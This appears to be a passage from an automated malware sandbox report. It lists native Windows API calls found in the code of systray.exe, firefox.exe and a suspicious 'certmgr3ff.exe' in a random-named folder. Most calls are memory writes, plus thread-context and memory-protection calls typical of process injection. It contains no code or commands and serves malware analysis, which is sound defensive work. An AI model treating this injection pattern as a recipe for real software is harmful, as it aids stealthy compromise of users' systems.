Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2ED0 NtResumeThread,	13_2_049D2ED0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2EC0 NtQuerySection,	13_2_049D2EC0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2E00 NtQueueApcThread,	13_2_049D2E00
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2F30 NtOpenDirectoryObject,	13_2_049D2F30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D29D0 NtWaitForSingleObject,	13_2_049D29D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2AA0 NtQueryInformationFile,	13_2_049D2AA0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2A10 NtWriteFile,	13_2_049D2A10
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2BE0 NtQueryVirtualMemory,	13_2_049D2BE0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D2B20 NtQueryInformationProcess,	13_2_049D2B20
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D3C90 NtOpenThread,	13_2_049D3C90
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D3C30 NtOpenProcessToken,	13_2_049D3C30
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_049D38D0 NtGetContextThread,	13_2_049D38D0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E8660 NtReadFile,	13_2_027E8660
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E86E0 NtClose,	13_2_027E86E0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E8790 NtAllocateVirtualMemory,	13_2_027E8790
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E85B0 NtCreateFile,	13_2_027E85B0
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E865A NtReadFile,	13_2_027E865A
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E86DB NtReadFile,NtClose,	13_2_027E86DB
Source: C:\Windows\SysWOW64\systray.exe	Code function: 13_2_027E85AA NtCreateFile,	13_2_027E85AA
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Code function: 21_2_000001E92741ED02 NtCreateFile,	21_2_000001E92741ED02
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241B688 NtProtectVirtualMemory,	23_2_0241B688
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024176AD NtAllocateVirtualMemory,	23_2_024176AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241BBCC NtSetContextThread,	23_2_0241BBCC
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416041 NtWriteVirtualMemory,	23_2_02416041
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416841 NtWriteVirtualMemory,	23_2_02416841
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241684C NtWriteVirtualMemory,	23_2_0241684C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416251 NtWriteVirtualMemory,	23_2_02416251
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416059 NtWriteVirtualMemory,	23_2_02416059
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241625D NtWriteVirtualMemory,	23_2_0241625D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A5D NtWriteVirtualMemory,	23_2_02416A5D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241A25C NtWriteVirtualMemory,LoadLibraryA,	23_2_0241A25C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416065 NtWriteVirtualMemory,	23_2_02416065
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416269 NtWriteVirtualMemory,	23_2_02416269
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A69 NtWriteVirtualMemory,	23_2_02416A69
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241646D NtWriteVirtualMemory,	23_2_0241646D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416071 NtWriteVirtualMemory,	23_2_02416071
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A75 NtWriteVirtualMemory,	23_2_02416A75
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416479 NtWriteVirtualMemory,	23_2_02416479
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416805 NtWriteVirtualMemory,	23_2_02416805
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241681D NtWriteVirtualMemory,	23_2_0241681D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416029 NtWriteVirtualMemory,	23_2_02416029
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416829 NtWriteVirtualMemory,	23_2_02416829
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416035 NtWriteVirtualMemory,	23_2_02416035
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416835 NtWriteVirtualMemory,	23_2_02416835
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415EC3 NtWriteVirtualMemory,	23_2_02415EC3
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415ECD NtWriteVirtualMemory,	23_2_02415ECD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415ED9 NtWriteVirtualMemory,	23_2_02415ED9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416CE1 NtWriteVirtualMemory,	23_2_02416CE1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415EE5 NtWriteVirtualMemory,	23_2_02415EE5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415EFD NtWriteVirtualMemory,	23_2_02415EFD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416281 NtWriteVirtualMemory,	23_2_02416281
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416485 NtWriteVirtualMemory,	23_2_02416485
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241628D NtWriteVirtualMemory,	23_2_0241628D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A8D NtWriteVirtualMemory,	23_2_02416A8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416491 NtWriteVirtualMemory,	23_2_02416491
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416A99 NtWriteVirtualMemory,	23_2_02416A99
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241649D NtWriteVirtualMemory,	23_2_0241649D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416AA5 NtWriteVirtualMemory,	23_2_02416AA5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024158A9 NtWriteVirtualMemory,	23_2_024158A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024164A9 NtWriteVirtualMemory,	23_2_024164A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416941 NtWriteVirtualMemory,	23_2_02416941
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416745 NtWriteVirtualMemory,	23_2_02416745
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241694D NtWriteVirtualMemory,	23_2_0241694D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416751 NtWriteVirtualMemory,	23_2_02416751
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416155 NtWriteVirtualMemory,	23_2_02416155
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416959 NtWriteVirtualMemory,	23_2_02416959
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241635B NtWriteVirtualMemory,	23_2_0241635B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241675D NtWriteVirtualMemory,	23_2_0241675D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416365 NtWriteVirtualMemory,	23_2_02416365
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416769 NtWriteVirtualMemory,	23_2_02416769
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241616D NtWriteVirtualMemory,	23_2_0241616D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416179 NtWriteVirtualMemory,	23_2_02416179
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241637D NtWriteVirtualMemory,	23_2_0241637D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415F11 NtWriteVirtualMemory,	23_2_02415F11
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02415F15 NtWriteVirtualMemory,	23_2_02415F15
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416929 NtWriteVirtualMemory,	23_2_02416929
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416935 NtWriteVirtualMemory,	23_2_02416935
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241673B NtWriteVirtualMemory,	23_2_0241673B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_0241613D NtWriteVirtualMemory,	23_2_0241613D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416BC5 NtWriteVirtualMemory,	23_2_02416BC5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165C9 NtWriteVirtualMemory,	23_2_024165C9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416BD1 NtWriteVirtualMemory,	23_2_02416BD1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165D5 NtWriteVirtualMemory,	23_2_024165D5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416BDD NtWriteVirtualMemory,	23_2_02416BDD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165E1 NtWriteVirtualMemory,	23_2_024165E1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416BF5 NtWriteVirtualMemory,	23_2_02416BF5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416185 NtWriteVirtualMemory,	23_2_02416185
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416389 NtWriteVirtualMemory,	23_2_02416389
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_02416395 NtWriteVirtualMemory,	23_2_02416395
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165B1 NtWriteVirtualMemory,	23_2_024165B1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 23_2_024165BD NtWriteVirtualMemory,	23_2_024165BD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022976AD NtAllocateVirtualMemory,	24_2_022976AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229B688 NtProtectVirtualMemory,	24_2_0229B688
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229BBCC NtSetContextThread,	24_2_0229BBCC
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296029 NtWriteVirtualMemory,	24_2_02296029
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296829 NtWriteVirtualMemory,	24_2_02296829
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296035 NtWriteVirtualMemory,	24_2_02296035
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296835 NtWriteVirtualMemory,	24_2_02296835
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296805 NtWriteVirtualMemory,	24_2_02296805
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229681D NtWriteVirtualMemory,	24_2_0229681D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296269 NtWriteVirtualMemory,	24_2_02296269
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A69 NtWriteVirtualMemory,	24_2_02296A69
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229646D NtWriteVirtualMemory,	24_2_0229646D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296065 NtWriteVirtualMemory,	24_2_02296065
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296479 NtWriteVirtualMemory,	24_2_02296479
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296071 NtWriteVirtualMemory,	24_2_02296071
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A75 NtWriteVirtualMemory,	24_2_02296A75
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229684C NtWriteVirtualMemory,	24_2_0229684C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296041 NtWriteVirtualMemory,	24_2_02296041
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296841 NtWriteVirtualMemory,	24_2_02296841
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296059 NtWriteVirtualMemory,	24_2_02296059
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229625D NtWriteVirtualMemory,	24_2_0229625D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A5D NtWriteVirtualMemory,	24_2_02296A5D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229A25C NtWriteVirtualMemory,LoadLibraryA,	24_2_0229A25C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296251 NtWriteVirtualMemory,	24_2_02296251
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022958A9 NtWriteVirtualMemory,	24_2_022958A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022964A9 NtWriteVirtualMemory,	24_2_022964A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296AA5 NtWriteVirtualMemory,	24_2_02296AA5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229628D NtWriteVirtualMemory,	24_2_0229628D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A8D NtWriteVirtualMemory,	24_2_02296A8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296281 NtWriteVirtualMemory,	24_2_02296281
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296485 NtWriteVirtualMemory,	24_2_02296485
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296A99 NtWriteVirtualMemory,	24_2_02296A99
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229649D NtWriteVirtualMemory,	24_2_0229649D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296491 NtWriteVirtualMemory,	24_2_02296491
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296CE1 NtWriteVirtualMemory,	24_2_02296CE1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295EE5 NtWriteVirtualMemory,	24_2_02295EE5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295EFD NtWriteVirtualMemory,	24_2_02295EFD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295ECD NtWriteVirtualMemory,	24_2_02295ECD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295EC3 NtWriteVirtualMemory,	24_2_02295EC3
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295ED9 NtWriteVirtualMemory,	24_2_02295ED9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296929 NtWriteVirtualMemory,	24_2_02296929
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229673B NtWriteVirtualMemory,	24_2_0229673B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229613D NtWriteVirtualMemory,	24_2_0229613D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296935 NtWriteVirtualMemory,	24_2_02296935
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295F11 NtWriteVirtualMemory,	24_2_02295F11
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02295F15 NtWriteVirtualMemory,	24_2_02295F15
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296769 NtWriteVirtualMemory,	24_2_02296769
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229616D NtWriteVirtualMemory,	24_2_0229616D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296365 NtWriteVirtualMemory,	24_2_02296365
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296179 NtWriteVirtualMemory,	24_2_02296179
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229637D NtWriteVirtualMemory,	24_2_0229637D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229694D NtWriteVirtualMemory,	24_2_0229694D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296941 NtWriteVirtualMemory,	24_2_02296941
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296745 NtWriteVirtualMemory,	24_2_02296745
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296959 NtWriteVirtualMemory,	24_2_02296959
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229635B NtWriteVirtualMemory,	24_2_0229635B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_0229675D NtWriteVirtualMemory,	24_2_0229675D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296751 NtWriteVirtualMemory,	24_2_02296751
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296155 NtWriteVirtualMemory,	24_2_02296155
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965BD NtWriteVirtualMemory,	24_2_022965BD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965B1 NtWriteVirtualMemory,	24_2_022965B1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296389 NtWriteVirtualMemory,	24_2_02296389
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296185 NtWriteVirtualMemory,	24_2_02296185
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296395 NtWriteVirtualMemory,	24_2_02296395
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965E1 NtWriteVirtualMemory,	24_2_022965E1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BF5 NtWriteVirtualMemory,	24_2_02296BF5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965C9 NtWriteVirtualMemory,	24_2_022965C9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BC5 NtWriteVirtualMemory,	24_2_02296BC5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BDD NtWriteVirtualMemory,	24_2_02296BDD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_02296BD1 NtWriteVirtualMemory,	24_2_02296BD1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 24_2_022965D5 NtWriteVirtualMemory,	24_2_022965D5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C76AD NtAllocateVirtualMemory,	25_2_022C76AD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CB688 NtProtectVirtualMemory,	25_2_022CB688
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6029 NtWriteVirtualMemory,	25_2_022C6029
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6829 NtWriteVirtualMemory,	25_2_022C6829
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6035 NtWriteVirtualMemory,	25_2_022C6035
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6835 NtWriteVirtualMemory,	25_2_022C6835
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6805 NtWriteVirtualMemory,	25_2_022C6805
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C681D NtWriteVirtualMemory,	25_2_022C681D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C646D NtWriteVirtualMemory,	25_2_022C646D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6269 NtWriteVirtualMemory,	25_2_022C6269
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A69 NtWriteVirtualMemory,	25_2_022C6A69
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6065 NtWriteVirtualMemory,	25_2_022C6065
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6479 NtWriteVirtualMemory,	25_2_022C6479
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A75 NtWriteVirtualMemory,	25_2_022C6A75
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6071 NtWriteVirtualMemory,	25_2_022C6071
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C684C NtWriteVirtualMemory,	25_2_022C684C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6041 NtWriteVirtualMemory,	25_2_022C6041
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6841 NtWriteVirtualMemory,	25_2_022C6841
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022CA25C NtWriteVirtualMemory,LoadLibraryA,	25_2_022CA25C
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C625D NtWriteVirtualMemory,	25_2_022C625D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A5D NtWriteVirtualMemory,	25_2_022C6A5D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6059 NtWriteVirtualMemory,	25_2_022C6059
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6251 NtWriteVirtualMemory,	25_2_022C6251
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C58A9 NtWriteVirtualMemory,	25_2_022C58A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C64A9 NtWriteVirtualMemory,	25_2_022C64A9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6AA5 NtWriteVirtualMemory,	25_2_022C6AA5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C628D NtWriteVirtualMemory,	25_2_022C628D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A8D NtWriteVirtualMemory,	25_2_022C6A8D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6485 NtWriteVirtualMemory,	25_2_022C6485
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6281 NtWriteVirtualMemory,	25_2_022C6281
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C649D NtWriteVirtualMemory,	25_2_022C649D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6A99 NtWriteVirtualMemory,	25_2_022C6A99
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6491 NtWriteVirtualMemory,	25_2_022C6491
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5EE5 NtWriteVirtualMemory,	25_2_022C5EE5
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6CE1 NtWriteVirtualMemory,	25_2_022C6CE1
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5EFD NtWriteVirtualMemory,	25_2_022C5EFD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5ECD NtWriteVirtualMemory,	25_2_022C5ECD
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5EC3 NtWriteVirtualMemory,	25_2_022C5EC3
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5ED9 NtWriteVirtualMemory,	25_2_022C5ED9
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6929 NtWriteVirtualMemory,	25_2_022C6929
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C613D NtWriteVirtualMemory,	25_2_022C613D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C673B NtWriteVirtualMemory,	25_2_022C673B
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6935 NtWriteVirtualMemory,	25_2_022C6935
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5F15 NtWriteVirtualMemory,	25_2_022C5F15
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C5F11 NtWriteVirtualMemory,	25_2_022C5F11
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C616D NtWriteVirtualMemory,	25_2_022C616D
Source: C:\Program Files (x86)\Aidr0p8lx\certmgr3ff.exe	Code function: 25_2_022C6769 NtWriteVirtualMemory,	25_2_022C6769
